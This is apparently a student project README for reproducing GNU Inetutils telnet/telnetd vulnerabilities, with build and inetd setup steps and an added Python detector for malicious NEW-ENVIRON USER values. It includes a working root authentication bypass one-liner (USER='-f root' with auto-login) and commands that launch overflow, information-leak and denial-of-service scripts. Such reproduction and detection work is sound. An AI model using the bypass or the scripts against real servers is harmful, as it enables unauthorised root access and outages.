DanielDPW/IF4053_Software_Security_Vulnerability_Analysis

GNU Inetutils Telnet Vulnerability Analysis

This repository contains the documentation, configuration files, and Proof of Concept (PoC) scripts used to analyze and reproduce security vulnerabilities within the telnet and telnetd components of GNU Inetutils versions 2.4 and 2.8.

Repository Structure

  • config/: Contains network and wrapper configuration files for the openbsd-inetd super-server.
  • exploits/: Contains all Python and bash PoC scripts used to trigger the vulnerabilities.
  • sast-results/: Contains static analysis logs generated by CodeQL and cppcheck.

Prerequisites

Ensure your system has the necessary tools to compile C code, handle network sockets, and run the Python scripts. Run the following on a Debian/Ubuntu-based system:

sudo apt update
sudo apt install -y build-essential openbsd-inetd python3 git wget curl

Installation & Build Instructions

To ensure consistency in reproducing the vulnerabilities, we use the inetutils-2.4 source code.

  1. Download and Extract:

    wget -q --show-progress https://ftp.gnu.org/gnu/inetutils/inetutils-2.4.tar.gz
    tar -xzf inetutils-2.4.tar.gz
    cd inetutils-2.4

  2. Compile specific Telnet components: We disable other network utilities to save time and isolate our target environment.

    mkdir build
    cd build
    ../configure --disable-servers --disable-clients --enable-telnetd --enable-telnet
    make
    cd ..

Server Configuration

The telnetd program requires a super-server to handle network connections. We use openbsd-inetd.

  1. Create the local configuration file (config/inetd.conf):

    echo "2323 stream tcp nowait root $PWD/build/telnetd/telnetd telnetd" > config/inetd.conf

  2. Start the server:

    sudo inetd -d "$PWD/config/inetd.conf"

Usage: Running the Exploits

Below are the instructions to reproduce each specific vulnerability. Ensure the inetd server is running on port 2323 before executing server-targeted exploits.

1. CVE-2026-24061: Authentication Bypass

This vulnerability leverages unsanitized environment variables to log in as root without a password.

USER="-f root" ./build/telnet/telnet -a 127.0.0.1 2323
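
A detection-side view of the auto-login case above, as an added example that is not part of this repository: with `-a` the client sends USER in a NEW-ENVIRON subnegotiation (RFC 1572), so a monitor can parse that option out of a captured client-to-server byte stream and flag values that start with `-` or contain whitespace. The function names and the sample bytes are constructed for illustration.

```python
# Added example, not part of the repository; sample bytes are constructed.
import re

NEW_ENVIRON = 39            # Telnet option code (RFC 1572)
IS, INFO = 0, 2             # first payload byte of a client-sent variable list
VALUE = 1                   # VAR=0 and USERVAR=3 start a name, ESC=2 quotes a byte
# IAC IAC (escaped data) is matched first so it can never be read as IAC SB.
SB_RE = re.compile(rb"\xff\xff|\xff\xfa(.)((?:[^\xff]|\xff\xff)*)\xff\xf0", re.S)
TOKEN_RE = re.compile(rb"([\x00\x01\x03])((?:[^\x00-\x03]|\x02.)*)", re.S)

def subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB ... IAC SE, undoing IAC IAC."""
    for m in SB_RE.finditer(stream):
        if m.group(1) is not None:
            yield m.group(1)[0], m.group(2).replace(b"\xff\xff", b"\xff")

def environ_vars(payload: bytes) -> dict:
    """Parse an IS/INFO payload into {name: value}, honouring ESC quoting."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    result, name = {}, None
    for kind, data in TOKEN_RE.findall(payload[1:]):
        text = re.sub(rb"\x02(.)", rb"\1", data, flags=re.S).decode("latin-1")
        if kind[0] != VALUE:
            name = text
            result.setdefault(name, "")
        elif name is not None:
            result[name] = text
    return result

def suspicious_user(stream: bytes) -> list:
    """Return USER values that start with '-' or contain whitespace."""
    hits = []
    for option, payload in subnegotiations(stream):
        user = environ_vars(payload).get("USER") if option == NEW_ENVIRON else None
        if user and (user[0] == "-" or any(c.isspace() for c in user)):
            hits.append(user)
    return hits

# Constructed client replies: IAC SB NEW-ENVIRON IS VAR "USER" VALUE <value> IAC SE
def sample_reply(value: bytes) -> bytes:
    return b"\xff\xfa\x27\x00\x00USER\x01" + value + b"\xff\xf0"
BENIGN, FLAGGED = sample_reply(b"alice"), sample_reply(b"-f root")

if __name__ == "__main__":
    print(suspicious_user(BENIGN), suspicious_user(FLAGGED))
```

The same leading-dash and whitespace check is what a server would apply to USER before handing it to the login program.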

2. CVE-2026-32746: Buffer Overflow (Server-Side)

This vulnerability triggers an Out-of-Bounds Write leading to a BSS memory leak during LINEMODE SLC negotiation.

python3 exploits/exploit.py

3. CVE-2026-32772: Information Disclosure (Client-Side)

This exploit sets up a rogue server to extract sensitive environment variables from a vulnerable client.

  1. Terminal 1 (Start the rogue server):

    python3 exploits/server.py

  2. Terminal 2 (Setup secrets and connect):

    export SECRET_1="SuperSecretData"
    ./build/telnet/telnet 127.0.0.1 2323

4. New Finding: Out-of-Bounds Write (Client-Side)

Triggers a buffer overflow on the client's slc_reply array.

  1. Terminal 1 (Start rogue server):

    python3 exploits/slc_overflow_server.py 127.0.0.1 2323 60

  2. Terminal 2 (Connect client):

    ./build/telnet/telnet 127.0.0.1 2323

5. New Finding: Pre-Authentication Resource Exhaustion (DoS)

Stalls the server's pre-authentication phase by exploiting a missing timeout in the io_drain loop.

python3 exploits/tspeed_hang_many.py 127.0.0.1 2323 100 60.0

Disclaimer: All scripts and tools provided in this repository are strictly for educational and academic purposes, intended only for testing authorized local environments.
